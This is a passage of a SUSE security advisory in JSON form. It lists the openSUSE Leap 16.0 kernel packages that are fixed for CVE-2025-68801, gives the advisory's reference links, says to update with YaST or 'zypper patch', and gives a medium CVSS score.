"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68801",
"url": "https://www.suse.com/security/cve/CVE-2025-68801"
},
{
"category": "external",
"summary": "SUSE Bug 1256653 for CVE-2025-68801",
"url": "https://bugzilla.suse.com/1256653"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
